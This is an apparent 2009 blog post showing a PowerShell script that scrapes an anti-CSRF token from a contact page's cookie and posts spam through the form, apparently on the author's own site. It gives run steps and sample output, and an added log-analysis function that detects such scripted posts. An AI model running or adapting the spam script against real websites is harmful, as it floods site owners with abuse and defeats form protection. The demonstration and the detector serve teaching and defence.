
Hacking Anti Cross-site Request Forgery Tokens (CSRF) With Powershell

December 16th, 2009

I ported the example of how to hack a form protected by an Anti-CSRF Token, previously shown in my post What Are Anti Cross-site Request Forgery Tokens And What Are They Good For?, to PowerShell.

How to hack an Anti-CSRF Token from PowerShell

POWERSHELL:
  function global:spam-adamdotcom(){

    # Load the assembly containing WebClientWithCookies and RegexUtilities
    [Reflection.Assembly]::LoadFile((Resolve-Path "AdamDotCom.WebClientWithCookies.dll")) | out-null

    # Load the assembly containing System.Web.HttpUtility
    [void][Reflection.Assembly]::LoadWithPartialName("System.Web")

    # create a new instance of the HTTP Web Client that supports cookies
    $webClient = New-Object AdamDotCom.Common.Service.Utilities.WebClientWithCookies

    # download the page that contains the Anti-CSRF Token
    [void] $webClient.DownloadData("http://adam.kahtava.com/contact");

    # use a regular expression to grab the Anti-CSRF Token
    #  - this is an MVC site so we're looking for a token named "__RequestVerificationToken_Lw__"
    $regex = "__RequestVerificationToken_Lw__=(?<CRSF_Token>[^;]+)"
    $match = [regex]::matches($webClient.ResponseHeaders["Set-Cookie"], $regex)[0]
    $antiCrsfToken = $match.Groups["CRSF_Token"].Captures[0].Value

    write-host "`nYour Anti CRSF Token is: " $antiCrsfToken

    # construct the message including the Anti-CSRF Token
    $message = "__RequestVerificationToken=" + [System.Web.HttpUtility]::UrlEncode($antiCrsfToken) +
               "&fromName=Johnathon Fink" +
               "&fromAddress=prancesw@rmcres.com" +
               "&subject=Call for your diploma now" +
               "&body=Is your lack of a degree..."

    # send spam-spam-spam
    $webClient.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
    [void] $webClient.UploadData("http://adam.kahtava.com/contact/send", "POST",
                                ([System.Text.Encoding]::UTF8.GetBytes($message)));

    write-host "`nSuccess!!! Your spam has been sent.`n"
  }

To run this script:

  1. Download the script
  2. Run PowerShell
  3. Load the script: .\Automated-AntiCSRF-Authentication-Script.ps1
  4. Start sending spam-spam-spam: PS > spam-adamdotcom

Here's the output as seen on my machine:

CODE:
  PS C:\> .\Automated-AntiCSRF-Authentication-Script.ps1
  PS C:\> spam-adamdotcom

  Your Anti CRSF Token is:  f54ZlHS3L1Xyl65dYd1uYYh90ygNKYmCswXJUnr0GYtgcrJdJILsQ2jyFotzc10L

  Success!!! Your spam has been sent.

This example uses a class derived from the .NET Framework's Web Client class, but with cookies enabled, so it depends on the AdamDotCom.Common.Service.dll assembly (browse the source here). This dependency can be resolved automatically by calling the download-client function that's also found within the PowerShell script.

Contribute, view, or download the openly available script here: Automated-AntiCSRF-Authentication-Script.ps1
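
The script above requests /contact only to collect the token and then posts to /contact/send straight away, and the token check accepts that because the token is valid. The following PowerShell function is an added example, not part of the original post or the author's script: it flags that fetch-then-post pattern in access logs. The log layout, the function name Find-ScriptedContactPosts and both thresholds are assumptions; only the two paths come from the script above.

```powershell
# Constructed sample log lines (not from the original post).
# Assumed layout: date, time, client IP, method, path, status.
$sampleLog = @'
2009-12-16 10:00:00 203.0.113.7 GET /contact 200
2009-12-16 10:00:00 203.0.113.7 POST /contact/send 302
2009-12-16 10:00:01 203.0.113.7 GET /contact 200
2009-12-16 10:00:01 203.0.113.7 POST /contact/send 302
2009-12-16 10:00:02 203.0.113.7 GET /contact 200
2009-12-16 10:00:02 203.0.113.7 POST /contact/send 302
2009-12-16 10:05:10 198.51.100.23 GET /contact 200
2009-12-16 10:07:42 198.51.100.23 POST /contact/send 302
'@

# Hypothetical helper: reports clients whose POSTs follow the form GET faster than a person could type.
function Find-ScriptedContactPosts {
    param(
        [string[]] $LogLines,
        [int] $MaxSecondsAfterGet = 2,   # assumed threshold: nobody fills in the form this fast
        [int] $MinFastPosts = 3          # assumed threshold: repeated fast posts before reporting
    )
    $lastGet = @{}    # client IP -> time of its most recent GET /contact
    $fastPosts = @{}  # client IP -> number of POSTs that followed a GET too quickly
    foreach ($line in $LogLines) {
        $date, $time, $ip, $method, $path, $status = $line.Trim() -split '\s+'
        if (-not $path) { continue }   # skip blank or malformed lines
        $when = [datetime]::ParseExact("$date $time", 'yyyy-MM-dd HH:mm:ss',
                                       [cultureinfo]::InvariantCulture)
        if ($method -eq 'GET' -and $path -eq '/contact') {
            $lastGet[$ip] = $when
        }
        elseif ($method -eq 'POST' -and $path -eq '/contact/send' -and $lastGet.ContainsKey($ip)) {
            $gap = ($when - $lastGet[$ip]).TotalSeconds
            if ($gap -ge 0 -and $gap -le $MaxSecondsAfterGet) { $fastPosts[$ip] = 1 + $fastPosts[$ip] }
            $lastGet.Remove($ip)   # each fetched form is paired with at most one POST
        }
    }
    # Emit one object per client that crossed the reporting threshold
    $fastPosts.GetEnumerator() | Where-Object { $_.Value -ge $MinFastPosts } |
        ForEach-Object { [pscustomobject]@{ ClientIp = $_.Key; FastPosts = $_.Value } }
}

Find-ScriptedContactPosts -LogLines ($sampleLog -split "`r?`n")
```

On the constructed sample, the client that posts within the same second as each fetch is reported, while the client that takes about two and a half minutes to submit the form is not.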

Author: Adam Kahtava